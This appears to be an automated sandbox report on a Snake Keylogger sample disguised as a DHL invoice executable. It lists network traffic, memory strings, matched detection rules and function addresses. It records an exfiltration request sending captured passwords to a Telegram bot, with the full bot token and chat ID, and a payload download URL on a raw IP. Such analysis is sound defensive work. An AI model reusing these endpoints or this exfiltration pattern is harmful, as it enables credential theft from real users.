              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21e85383b951Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.22.121.182
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.22.121.182/STATO/Vskhdvzxu.mp3
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeString found in binary or memory: http://160.22.121.182/STATO/Vskhdvzxu.mp310zmhb41piE2K/FJ1XdBqJA==
              Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002594000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49769 version: TLS 1.2

              System Summary

              barindex
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: initial sampleStatic PE information: Filename: Invoice DHL - AWB 2024 E4001 - 0000731.exe
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic file information: Suspicious name
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_052E1370 NtResumeThread,0_2_052E1370
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523ED10 NtProtectVirtualMemory,0_2_0523ED10
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523ED08 NtProtectVirtualMemory,0_2_0523ED08
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05296E5B0_2_05296E5B
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_052E24F80_2_052E24F8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_00A51C300_2_00A51C30
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_00A51C210_2_00A51C21
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_00A525B20_2_00A525B2
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523B4480_2_0523B448
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523EA700_2_0523EA70
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523B4380_2_0523B438
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_052347E00_2_052347E0
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523DDB80_2_0523DDB8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523DDC80_2_0523DDC8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0523EA600_2_0523EA60
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05398D3B0_2_05398D3B
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05394FE80_2_05394FE8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_053973C80_2_053973C8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_053914B10_2_053914B1
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_053914C00_2_053914C0
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05394FD90_2_05394FD9
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0539D2C80_2_0539D2C8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C17CB80_2_05C17CB8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C17CA90_2_05C17CA9
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C161D80_2_05C161D8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C161E80_2_05C161E8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C1814F0_2_05C1814F
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C246610_2_05C24661
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C211100_2_05C21110
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C200D90_2_05C200D9
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C211000_2_05C21100
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C25C780_2_05C25C78
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05C249970_2_05C24997
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7DDA80_2_05F7DDA8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7DD9B0_2_05F7DD9B
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7D5560_2_05F7D556
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F745580_2_05F74558
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7CCBB0_2_05F7CCBB
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7F7BF0_2_05F7F7BF
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7BF570_2_05F7BF57
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_05F7E0CB0_2_05F7E0CB
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0624E1280_2_0624E128
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_062300330_2_06230033
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_062300400_2_06230040
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 0_2_0624DD480_2_0624DD48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CF0174_2_009CF017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009C61204_2_009C6120
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CB3384_2_009CB338
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CC4574_2_009CC457
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009C46D94_2_009C46D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CB7E24_2_009CB7E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009C67484_2_009C6748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CC7614_2_009CC761
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009C98684_2_009C9868
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CBAC04_2_009CBAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CCA414_2_009CCA41
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CBDA04_2_009CBDA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CC4804_2_009CC480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CE5384_2_009CE538
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009CE5274_2_009CE527
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_009C35704_2_009C3570
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D911C04_2_05D911C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D900404_2_05D90040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D938704_2_05D93870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D984604_2_05D98460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D97B704_2_05D97B70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9C6484_2_05D9C648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9C1F04_2_05D9C1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9C1E04_2_05D9C1E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9BD984_2_05D9BD98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D97D904_2_05D97D90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9BD884_2_05D9BD88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9F1B84_2_05D9F1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D911B04_2_05D911B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9F1A94_2_05D9F1A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D90D514_2_05D90D51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9ED504_2_05D9ED50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9B9404_2_05D9B940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D90D604_2_05D90D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9ED604_2_05D9ED60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9E9084_2_05D9E908
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D909004_2_05D90900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9B9304_2_05D9B930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9B4D74_2_05D9B4D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9E8F84_2_05D9E8F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D908F04_2_05D908F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9B4E84_2_05D9B4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D904904_2_05D90490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9E4B04_2_05D9E4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D904A04_2_05D904A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9E4A04_2_05D9E4A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9E0584_2_05D9E058
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9E04B4_2_05D9E04B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D938604_2_05D93860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9DC004_2_05D9DC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D900074_2_05D90007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D973D84_2_05D973D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9DBF14_2_05D9DBF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D973E84_2_05D973E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9D7984_2_05D9D798
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9D7A84_2_05D9D7A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9D3504_2_05D9D350
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9D3404_2_05D9D340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9CEF84_2_05D9CEF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9CEE94_2_05D9CEE9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9CA904_2_05D9CA90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9CAA04_2_05D9CAA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D9FA594_2_05D9FA59
